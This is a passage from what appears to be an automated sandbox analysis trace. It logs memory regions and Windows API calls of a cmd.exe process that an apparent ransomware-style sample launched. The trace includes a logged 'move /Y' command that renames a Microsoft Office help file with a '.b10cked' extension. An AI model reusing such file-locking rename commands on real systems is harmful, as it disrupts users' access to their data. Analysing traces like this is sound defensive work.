pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 29183 start_va = 0x240000 end_va = 0x307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 29184 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29185 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29186 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29187 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29188 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29189 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29190 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 29191 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 29192 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 29194 start_va = 0x12f0000 end_va = 0x13affff entry_point = 0x12f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 656 
os_tid = 0xa24 [0197.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd2c | out: lpSystemTimeAsFileTime=0x1efd2c*(dwLowDateTime=0xaa898180, dwHighDateTime=0x1d440a9)) [0197.492] GetCurrentProcessId () returned 0xb8c [0197.492] GetCurrentThreadId () returned 0xa24 [0197.492] GetTickCount () returned 0x37edf [0197.492] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd24 | out: lpPerformanceCount=0x1efd24*=25428124270) returned 1 [0197.493] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0197.493] __set_app_type (_Type=0x1) [0197.493] __p__fmode () returned 0x76b331f4 [0197.493] __p__commode () returned 0x76b331fc [0197.493] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0197.493] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0197.493] GetCurrentThreadId () returned 0xa24 [0197.493] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa24) returned 0x38 [0197.494] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.494] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0197.494] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.494] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efcbc | out: phkResult=0x1efcbc*=0x0) returned 0x2 [0197.494] VirtualQuery (in: lpAddress=0x1efcf3, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.494] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc8c, dwLength=0x1c | out: 
lpBuffer=0x1efc8c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0197.494] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0197.494] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.494] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc8c, dwLength=0x1c | out: lpBuffer=0x1efc8c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.494] GetConsoleOutputCP () returned 0x1b5 [0197.494] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.494] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0197.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.494] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0197.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.495] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.495] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.495] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.495] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.495] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0197.496] GetEnvironmentStringsW () returned 0x380180* [0197.496] FreeEnvironmentStringsW (penv=0x380180) returned 1 [0197.496] GetEnvironmentStringsW () 
returned 0x380180* [0197.496] FreeEnvironmentStringsW (penv=0x380180) returned 1 [0197.496] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec2c | out: phkResult=0x1eec2c*=0x40) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0xa8, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x1, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x1, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x0, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x40, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x40, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.496] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x40, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.496] RegCloseKey (hKey=0x40) 
returned 0x0 [0197.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eec2c | out: phkResult=0x1eec2c*=0x40) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x40, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x1, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x1, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x0, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x9, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x4, lpData=0x1eec38*=0x9, lpcbData=0x1eec30*=0x4) returned 0x0 [0197.497] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eec34, lpData=0x1eec38, lpcbData=0x1eec30*=0x1000 | out: lpType=0x1eec34*=0x0, lpData=0x1eec38*=0x9, lpcbData=0x1eec30*=0x1000) returned 0x2 [0197.497] RegCloseKey (hKey=0x40) returned 0x0 [0197.497] time (in: timer=0x0 | out: timer=0x0) returned 
0x5b88639f [0197.497] srand (_Seed=0x5b88639f) [0197.497] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"" [0197.497] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"" [0197.497] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.498] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3818e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0197.498] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0197.498] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0197.498] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.498] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0197.498] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0197.498] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0197.498] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0197.498] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0197.498] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0197.498] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0197.498] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0197.498] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0197.499] 
GetEnvironmentStringsW () returned 0x3822d0* [0197.499] FreeEnvironmentStringsW (penv=0x3822d0) returned 1 [0197.499] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.499] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.499] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0197.499] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0197.499] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0197.499] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0197.499] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0197.499] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0197.499] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0197.499] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0197.499] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef9f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.499] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef9f8, lpFilePart=0x1ef9f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef9f4*="Desktop") returned 0x18 [0197.499] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.499] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef774 | out: lpFindFileData=0x1ef774) returned 0x380010 [0197.500] FindClose (in: hFindFile=0x380010 | out: hFindFile=0x380010) returned 1 [0197.500] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef774 | out: lpFindFileData=0x1ef774) returned 0x380010 [0197.500] FindClose (in: hFindFile=0x380010 | out: hFindFile=0x380010) returned 1 [0197.500] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef774 | out: 
lpFindFileData=0x1ef774) returned 0x380010 [0197.500] FindClose (in: hFindFile=0x380010 | out: hFindFile=0x380010) returned 1 [0197.500] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.500] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0197.500] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0197.500] GetEnvironmentStringsW () returned 0x382af0* [0197.501] FreeEnvironmentStringsW (penv=0x382af0) returned 1 [0197.501] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.501] GetConsoleOutputCP () returned 0x1b5 [0197.501] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.501] GetUserDefaultLCID () returned 0x409 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efb38, cchData=128 | out: lpLCData="0") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efb38, cchData=128 | out: lpLCData="0") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efb38, cchData=128 | out: lpLCData="1") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, 
cchData=32 | out: lpLCData="Thu") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0197.502] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0197.502] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0197.504] GetConsoleTitleW (in: lpConsoleTitle=0x3708e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.616] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.616] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0197.616] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0197.616] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0197.617] _wcsicmp (_String1="move", _String2=")") returned 68 [0197.617] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0197.617] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0197.617] _wcsicmp (_String1="IF", _String2="move") returned -4 [0197.617] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0197.617] _wcsicmp (_String1="REM", _String2="move") returned 5 [0197.617] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0197.620] GetConsoleTitleW (in: lpConsoleTitle=0x1ef830, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.620] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0197.620] _wcsicmp (_String1="move", _String2="ERASE") returned 8 
[0197.620] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0197.620] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0197.620] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="CD") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0197.620] _wcsicmp (_String1="move", _String2="REN") returned -5 [0197.620] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0197.620] _wcsicmp (_String1="move", _String2="SET") returned -6 [0197.620] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0197.620] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0197.620] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0197.620] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0197.620] _wcsicmp (_String1="move", _String2="MD") returned 11 [0197.620] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0197.620] _wcsicmp (_String1="move", _String2="RD") returned -5 [0197.620] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0197.620] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0197.620] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0197.620] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0197.620] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0197.620] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0197.620] _wcsicmp (_String1="move", _String2="VER") returned -9 [0197.620] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0197.620] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0197.620] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0197.620] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0197.620] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0197.621] _wcsicmp (_String1="move", _String2="START") 
returned -6 [0197.621] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0197.621] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0197.621] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0197.622] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.622] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.622] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef5ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef5e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef5e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0197.622] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 
[0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0197.623] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0197.623] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0197.623] _wcsicmp (_String1="MSGRAP~1.HXN", _String2=".") returned 63 [0197.623] _wcsicmp (_String1="MSGRAP~1.HXN", _String2="..") returned 63 [0197.623] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msgrap~1.hxn")) 
returned 0x2022 [0197.624] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x381e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.624] SetErrorMode (uMode=0x0) returned 0x0 [0197.624] SetErrorMode (uMode=0x1) returned 0x0 [0197.624] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", nBufferLength=0x104, lpBuffer=0x1eef74, lpFilePart=0x1eef5c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", lpFilePart=0x1eef5c*="MSGRAP~1.HXN") returned 0x27 [0197.624] SetErrorMode (uMode=0x0) returned 0x1 [0197.624] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0197.624] _wcsicmp (_String1="MSGRAP~1.HXN", _String2=".") returned 63 [0197.624] _wcsicmp (_String1="MSGRAP~1.HXN", _String2="..") returned 63 [0197.624] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msgrap~1.hxn")) returned 0x2022 [0197.624] SetErrorMode (uMode=0x0) returned 0x0 [0197.624] SetErrorMode (uMode=0x1) returned 0x0 [0197.624] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", nBufferLength=0x104, lpBuffer=0x1ef3f0, lpFilePart=0x1ef188 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN", lpFilePart=0x1ef188*="MSGRAP~1.HXN") returned 0x27 [0197.624] SetErrorMode (uMode=0x0) returned 0x1 [0197.624] SetErrorMode (uMode=0x0) returned 0x0 [0197.624] SetErrorMode (uMode=0x1) returned 0x0 [0197.624] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1ef5f8, lpFilePart=0x1ef188 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked", 